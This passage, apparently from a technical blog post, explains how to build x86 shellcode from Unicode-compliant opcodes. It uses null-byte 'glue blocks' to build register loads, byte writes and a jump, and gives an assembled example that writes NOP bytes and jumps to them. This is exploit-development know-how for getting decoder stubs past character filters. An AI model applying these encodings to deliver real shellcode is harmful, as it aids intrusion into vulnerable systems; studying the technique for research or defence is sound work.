fun fact – sifting through the intel reference manual we can see that the set of operands al /ax /eax can provide plenty compliant opcodes which will not be compliant with other registers used. for eg:
MOV DWORD PTR DS:[EBX],110011 – C7 03 11 00 11 00
MOV DWORD PTR DS:[EAX],110011 – C7 00 11 00 11 00

now consider the following opcodes:
push 11003300 – 6800330011
*GB
push esp – 54
*GB
pop eax – 58
*GB
add dword ptr [eax], 00220044
*GB
pop ecx

now ecx == 0×11223344
this is better than we expected. we have set all four bytes.

we already know how to change the two lower-most bytes if we want to zero them out. we also know how to zero out the 2nd topmost byte,or both high bytes. if we want to get 0×00112233 we can use (i’m omitting opcode encoding from hereon):

push 11003300 ; [esp] = 11003300
*GB
push 11003300 ; [esp] = 11003300
*GB
inc esp ; [esp] = 00110033
*GB
pop ecx ; ecx = 00110033
*GB
dec esp ; [esp] = 11003300
pop eax ; to restore stack

and then set the missing low bytes. We already know a different way of doing this – look for it.

Thus we have a compact method of performing mov r32,imm32 for any value.

(U) basic block no. 2: mov [reg32],imm8, inc reg32 # imm8 !=0 – attempt 1.0

First, let’s assume we know what data is present at the copy destination address. In this case, it will be pretty easy to build this BB. We will be using an add operation. here we are adding 0×90 to a one byte at [ecx], and ecx++.

mov eax,90009000 ; ah=90
add byte ptr [ecx],ah ; [ecx] += 0×90
inc ecx

this of course will be padded with *GB whenever needed. if we don’t know what data lays at [ecx] we could try this:
push ecx
pop eax ; eax =ecx
mov byte ptr al,[eax] ; al= [ecx]

;negate eax
push 0
pop ebx
add bh,al ; bh =al == [ecx]
xor ebx, ff00ff00
push 0
pop eax;
add al,bh ; al = al ^ 0xff == [ecx]^0xff
inc al ; al++ == -(byte ptr [ecx] )

;add negated value, and wanted value
mov edx, 11001100
add al,dh
add byte ptr [ecx],al ; [ecx] = [ecx] + (-[ecx] + dh) == dh == 11
inc ecx

once again, padded with *GB. this is not very elegant or small, but seems to work nicely. let’s give it another try. this time using completely different types of opcodes:
push esp
pop edx

inc ecx
inc ecx
inc ecx
inc ecx

push ecx
pop esp

set(ebx,0×90909090)
push ebx

push edx
pop esp

this looks nicer.

(U) 3) jmp/call reg32
this is easy:
push ecx
*GB
retn

(U) 4) the star of the evening – our very own – Glue Block we could try this:
ADD BYTE PTR SS:[EBP],AL – 004500

or this – after setting the right registers.

ADD BYTE PTR DS:[EAX],CL ; (we could probably pull eax off the stack, but can’t use set(eax,0xADDR) because we can’t use this GB, which is needed to do this there are probably a few others. Using these may require us to do minor fixups. this basically sums up everything we need to build a fancy ascii-to-shellcode decoder. now that we have our 4 basic blocks we can use them to program/ like this: 2-3-4-1-1-1-2-3-4-4/ just kidding.

An example simple windows code that copies four nop bytes to [7FFE0300 +0x100] looks like this:
what we would really be copying is a short code to find the original shellcode, and decode it. this is pretty simple straight-forward assembly

; ecx = 7FFE0400
68 0004007F PUSH 7F000400
0045 00 ADD BYTE PTR SS:[EBP],AL
54 PUSH ESP ; GB
58 POP EAX
8100 0100FE00 ADD DWORD PTR DS:[EAX],0FE0001
59 POP ECX
0045 00 ADD BYTE PTR SS:[EBP],AL
49 DEC ECX

;al = 0×90

0045 00 ADD BYTE PTR SS:[EBP],AL
B8 00900090 MOV EAX,90009000
00E0 ADD AL,AH

;byte ptr [ecx] = 0×90
;ecx ++

0045 00 ADD BYTE PTR SS:[EBP],AL
0001 ADD BYTE PTR DS:[ECX],AL; [ecx] = 0×90
0045 00 ADD BYTE PTR SS:[EBP],AL
41 INC ECX ;ecx++

;byte ptr [ecx] = 0×90
;ecx ++

0001 ADD BYTE PTR DS:[ECX],AL [ecx] = 0×90
0045 00 ADD BYTE PTR SS:[EBP],AL
41 INC ECX

;byte ptr [ecx] = 0×90
;ecx ++

0045 00 ADD BYTE PTR SS:[EBP],AL
0001 ADD BYTE PTR DS:[ECX],AL
41 INC ECX

;byte ptr [ecx] = 0×90
;ecx ++

0045 00 ADD BYTE PTR SS:[EBP],AL
0001 ADD BYTE PTR DS:[ECX],AL
0045 00 ADD BYTE PTR SS:[EBP],AL

;jmp [ecx-4]

DEC ECX
DEC ECX
DEC ECX
DEC ECX

51 PUSH ECX
0045 00 ADD BYTE PTR SS:[EBP],AL
C3 RET

0000

Of course, all the methods I discussed here can be highly optimized(such using dword values?), and probably some other methods may be used. these are the basics

Also, if we want to keep a code-shellcode ratio anything close to plausible, we will have to be able to write small amount of bytes that can find the original chunk and decode it from our
destination address. this can very often be done through use of register and stack state at the time the shellocde started running. we’re in luck with this – pushad is compliant.